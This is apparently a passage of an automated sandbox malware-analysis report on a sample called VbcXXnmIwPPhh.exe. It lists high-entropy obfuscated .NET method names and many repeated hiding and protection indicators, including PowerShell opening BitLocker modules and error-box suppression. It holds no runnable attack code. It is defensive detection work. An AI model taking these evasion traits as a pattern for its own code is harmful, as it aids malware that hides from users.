                  Source: 0.2.VbcXXnmIwPPhh.exe.7730000.8.raw.unpack, fLnSLcQsburVYyKgWh.csHigh entropy of concatenated method names: 'pIb9MloKhA', 'btn94NtaLA', 'mTK9QfZnoS', 'wRd9894dcU', 'ET59Z9xoO7', 'xL09CQygcx', 'qP89sdBucM', 'Rwp91lgwXE', 'fPj9ls0GM0', 'nks9XUYwAO'
                  Source: 0.2.VbcXXnmIwPPhh.exe.7730000.8.raw.unpack, rlPD0bXvfvPTrMIcH5.csHigh entropy of concatenated method names: 'e65TwXhNAU', 'w7ATay3otw', 'vrOTr8r1hQ', 'c6drog7VmU', 'QRvrzRjDHx', 'D5mTdY4DOy', 'XJwTi8ol6A', 'Et7TtSsUv7', 'c1ETWhxGlJ', 'it6T2gL70U'
                  Source: 0.2.VbcXXnmIwPPhh.exe.7730000.8.raw.unpack, LL8myueE5FL4FwPBUS.csHigh entropy of concatenated method names: 'IGY7wAn8xX', 'SMf7bnNiMM', 'gai7aBcGKZ', 'gYU7xa46mf', 'Tai7ri1XLD', 'RWM7Tud8cw', 'S477LeGX0v', 'oWQ7jDfCfk', 'X567VkWFsL', 'qgK7k0yM4F'
                  Source: 0.2.VbcXXnmIwPPhh.exe.7730000.8.raw.unpack, aTN0PgLVcauSVu2vqN.csHigh entropy of concatenated method names: 'x2HWAJrm7n', 'YRBWwTlYhH', 'NITWbSnOJ8', 'oykWaLIb5Y', 'QgSWx7XFW1', 'el2WrcOKqI', 'IlEWTQlXkN', 'XqqWLYjyje', 'AZZWjYFYgF', 'eZoWVEVCrl'
                  Source: 0.2.VbcXXnmIwPPhh.exe.7730000.8.raw.unpack, nH6PHboIq1eMy9lsOx.csHigh entropy of concatenated method names: 'ackui3ikbG', 'gSuuWAk9xU', 'vdRu2MdvAZ', 'SFIuws18kO', 'yPpub68xXI', 'OkEuxOlrHJ', 'zp8urCGwpj', 'kWA7FodH4s', 'kgH7eVO1XV', 'ktZ7DwkVEe'
                  Source: 0.2.VbcXXnmIwPPhh.exe.7730000.8.raw.unpack, kUuY6siW5vyxdHktXRf.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'lNPfQMtMH6', 'fkjf8cg9YX', 'CT4fc0NUBi', 'F4vfU3T65j', 'Py4fnEdgPE', 'TU0fSVvsBc', 'PXIfFg2SIF'
                  Source: 0.2.VbcXXnmIwPPhh.exe.7730000.8.raw.unpack, KdrMBNtPmnWruc2Qo7.csHigh entropy of concatenated method names: 'bNhBtReFj', 'YwuJEL0k0', 'STtIOekSi', 'TA5O2Qx0W', 'Uwx0i4UAw', 'SKZRHMqIX', 'FaWcWiVd8IfEJwL3Zh', 'aP4F1ZkeqAoDHx4Lni', 'hY17K8DD4', 'YC2fqW3vm'
                  Source: 0.2.VbcXXnmIwPPhh.exe.7730000.8.raw.unpack, eRvY0DhwwMDag3tMd8.csHigh entropy of concatenated method names: 'kEKrAhwBHI', 'QSIrbFKx8p', 'ktdrxpX7HE', 'J8drTrlP1a', 'NQZrLqnoFZ', 'Ddvxn0inuX', 'uhsxSNldTl', 'uZmxFBsHXU', 'yk3xe1MXrB', 'eqtxDwg8Hs'
                  Source: 0.2.VbcXXnmIwPPhh.exe.7730000.8.raw.unpack, L6vjyKid9aDaoe5HiaO.csHigh entropy of concatenated method names: 'tKYuvg3uhQ', 'dkau6uePqw', 'LNruBiEWeX', 'bvEuJGXBRD', 'JXvuy30LoP', 'i90uII0vV5', 'OpSuOBSVNI', 'VUEuG1wI7u', 'pYqu0SUl47', 'GmmuRirhCu'
                  Source: 0.2.VbcXXnmIwPPhh.exe.7730000.8.raw.unpack, p94yMyHuCERHsEo3os.csHigh entropy of concatenated method names: 'UsUKGd1mkt', 'U6CK0pf1S0', 'S3PKhLWoSg', 'UerKZ8wgdv', 'aD9KsVHUvx', 'SaAK1fhsGJ', 'vllKXTUJdY', 'AOYK5k7Qcf', 'WbUKM7gBsa', 'uhFKmU0jCt'
                  Source: 0.2.VbcXXnmIwPPhh.exe.7730000.8.raw.unpack, HBDxB2GmiOduxajCiD.csHigh entropy of concatenated method names: 'VG8bQdamFt', 'Mcsb8Neh6h', 'j76bcyQceC', 'rqobUIVvGH', 'GOmbn1VCfa', 'XEBbSAXcxL', 'cY6bFGmfXk', 'rZ0be0CNYh', 'FPbbDSgUqK', 'NdcbonGkta'
                  Source: 0.2.VbcXXnmIwPPhh.exe.7730000.8.raw.unpack, qHKnAkDX8ytgCp1mSc.csHigh entropy of concatenated method names: 'XcY7hRUl9B', 'Lf07Z6ZgBh', 'dTS7CjD8xQ', 'I7x7s45AYg', 'XK67QEMgwi', 'M0i719PkGi', 'Next', 'Next', 'Next', 'NextBytes'
                  Source: 0.2.VbcXXnmIwPPhh.exe.7730000.8.raw.unpack, sjbL9g05wUgikYyDq1.csHigh entropy of concatenated method names: 'm27aJnf468', 'bAfaI74f6b', 'JqVaGiBOTZ', 'Cfsa0q7xQy', 'eDra9nnYur', 'qUOaENg53T', 'l30aN5OS2T', 'ttJa7hxU2t', 'I0FauJhQu3', 'VNAafHbWpQ'
                  Source: 0.2.VbcXXnmIwPPhh.exe.7730000.8.raw.unpack, XOPcij2EZTlP5u1gAE.csHigh entropy of concatenated method names: 'oiZiTBDxB2', 'OiOiLduxaj', 'N5wiVUgikY', 'ADqik1gy32', 'gk1i94dARv', 'v0DiEwwMDa', 'h9K238GjxV4a826a1t', 'AXiI3JJh6XSFe6oQp7', 'waYiijekAY', 'AEpiW4fqTH'
                  Source: 0.2.VbcXXnmIwPPhh.exe.7730000.8.raw.unpack, qiNcDkbGW6sJO9UAgD.csHigh entropy of concatenated method names: 'Dispose', 'p7uiDLa8Py', 'MSFtZuGERn', 'TOyqqR1KP0', 'P5Lio8myuE', 'MFLiz4FwPB', 'ProcessDialogKey', 'TS7tdHKnAk', 'K8ytitgCp1', 'OScttkH6PH'
                  Source: 0.2.VbcXXnmIwPPhh.exe.32f4240.0.raw.unpack, JK.csHigh entropy of concatenated method names: 'JK', 'Y3', 'Lv', 'F5', 'q9', 'Ou', 'NL', 'tg', 'Jy', 'kq'
                  Source: 0.2.VbcXXnmIwPPhh.exe.32a52e4.2.raw.unpack, JK.csHigh entropy of concatenated method names: 'JK', 'Y3', 'Lv', 'F5', 'q9', 'Ou', 'NL', 'tg', 'Jy', 'kq'
                  Source: 0.2.VbcXXnmIwPPhh.exe.32ae8fc.1.raw.unpack, JK.csHigh entropy of concatenated method names: 'JK', 'Y3', 'Lv', 'F5', 'q9', 'Ou', 'NL', 'tg', 'Jy', 'kq'
                  Source: 0.2.VbcXXnmIwPPhh.exe.5a60000.7.raw.unpack, JK.csHigh entropy of concatenated method names: 'JK', 'Y3', 'Lv', 'F5', 'q9', 'Ou', 'NL', 'tg', 'Jy', 'kq'

                  Hooking and other Techniques for Hiding and Protection

                  barindex
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
